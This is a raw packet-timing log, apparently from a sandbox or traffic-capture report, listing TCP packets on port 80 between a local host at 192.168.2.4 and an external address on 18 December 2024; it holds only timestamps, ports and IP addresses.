                                                          Dec 18, 2024 09:32:35.063983917 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.068341017 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.068428040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.068443060 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.072786093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.072848082 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.072865009 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.077666998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.077739954 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.077842951 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.081717014 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.081733942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.081779003 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.086332083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.086405039 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.086433887 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.090492964 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.090552092 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.090658903 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.094957113 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.095025063 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.095050097 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.099700928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.099761009 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.099792004 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.104114056 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.104170084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.104193926 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.108201027 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.108277082 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.108342886 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.112667084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.112740040 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.112775087 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.117101908 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.117172003 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.117224932 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.121586084 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.121649981 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.121666908 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.126055956 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.126116037 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.126157045 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.172401905 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.221784115 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.221913099 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.221987963 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.223587990 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.223720074 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.223786116 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.227217913 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.227307081 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.227375031 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.230806112 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.230912924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.230978966 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.234457970 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.234587908 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.234688044 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.238049984 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.238249063 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.238313913 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.241429090 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.241543055 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.241601944 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.244792938 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.244925022 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.244991064 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.248176098 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.248235941 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.248292923 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.251449108 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.251542091 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.251616001 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.254774094 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.254899025 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.254971027 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.257922888 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.258109093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.258167982 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.260938883 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.261048079 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.261101007 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.264170885 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.264334917 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.264403105 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.267282009 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.267448902 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.267529964 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.270417929 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.270522118 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.270593882 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.273686886 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.273742914 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.273808002 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.276767969 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.276784897 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.276844978 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.279903889 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.280016899 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.280071974 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.283101082 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.283210039 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.283271074 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.286304951 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.286334038 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.286391973 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.289414883 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.289504051 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.289561987 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.292593956 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.292690039 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.292745113 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.295820951 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.295908928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.295975924 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.298943043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.299063921 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.299122095 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.302113056 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.302164078 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.302229881 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.305233955 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.305372000 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.305455923 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.308471918 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.308577061 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.308634996 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.311594009 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.311686993 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.311752081 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.314752102 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.314996958 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.315063000 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.318064928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.318144083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.318197966 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.321099043 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.321249962 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.321310043 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.324302912 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.324413061 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.324466944 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.327467918 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.327584028 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.327644110 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.330641985 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.330720901 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.330784082 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.333784103 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.333889961 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.333945036 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.336925983 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.337043047 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.337115049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.340116024 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.340224981 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.340337992 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.343336105 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.343435049 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.343489885 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.346474886 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.346554041 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.346616030 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.349649906 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.349719048 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.349782944 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.429711103 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.429825068 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.429939985 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.430974007 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.431090117 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.431148052 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.433124065 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.433173895 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.433262110 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.435384989 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.435512066 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.435570955 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.437669992 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.437750101 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.437814951 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.439891100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.440006971 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.440061092 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.442069054 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.442208052 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.442293882 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.444324970 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.444432020 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.444483042 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.446518898 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.446614027 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.446664095 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.448580980 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.448728085 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.448780060 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.450675011 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.450807095 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.450864077 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.452822924 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.452954054 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.453007936 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.455054998 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.455153942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.455208063 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.457027912 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.457102060 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.457155943 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.458976984 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.459068060 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.459125042 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.461253881 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.461375952 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.461452007 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.462950945 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.463202953 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.463263035 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.465095997 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.465220928 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.465277910 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.466924906 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.467073917 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.467133045 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.468889952 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.468954086 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.469010115 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.470877886 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.471103907 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.471159935 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.472851992 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.473011971 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.473064899 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.474746943 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.474885941 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.474939108 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.475847960 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.475966930 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.476022959 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.476999044 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.477094889 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.477152109 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.478122950 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.478226900 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.478281975 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.479218960 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.479353905 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.479412079 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.480344057 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.480488062 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.480566025 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.481532097 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.481632948 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.481688023 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.482646942 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.482764006 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.482817888 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.483864069 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.483967066 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.484025002 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.484908104 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.484977961 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.485032082 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.486042976 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.486144066 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.486207008 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.487166882 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.487270117 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.487384081 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.488337040 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.488414049 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.488468885 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.489382029 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.489550114 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.489608049 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.490523100 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.490659952 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.490715981 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.491677999 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.491777897 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.491833925 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.492862940 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.493024111 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.493078947 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.493951082 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.494163036 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.494218111 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.495137930 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.495274067 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.495347023 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.496215105 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.496332884 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.496397018 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.497348070 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.497544050 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.497602940 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.498464108 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.498497963 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.498564005 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.499789000 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.499906063 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.499959946 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.500894070 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.500968933 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.501020908 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.502000093 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.502166033 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.502221107 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.502996922 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.503166914 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.503227949 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.504125118 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.504242897 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.504303932 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.505278111 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.505388975 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.505449057 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.506423950 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.506596088 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.506652117 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.507611990 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.507667065 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.507720947 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.508644104 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.508734941 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.508789062 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.509787083 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.509922981 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.509979963 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.620685101 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.620805979 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.620901108 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.621258974 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.621345997 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.621408939 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.622390032 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.622503996 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.622560978 CET4973080192.168.2.4139.99.188.124
                                                          Dec 18, 2024 09:32:35.623568058 CET8049730139.99.188.124192.168.2.4
                                                          Dec 18, 2024 09:32:35.623653889 CET8049730139.99.188.124192.168.2.4
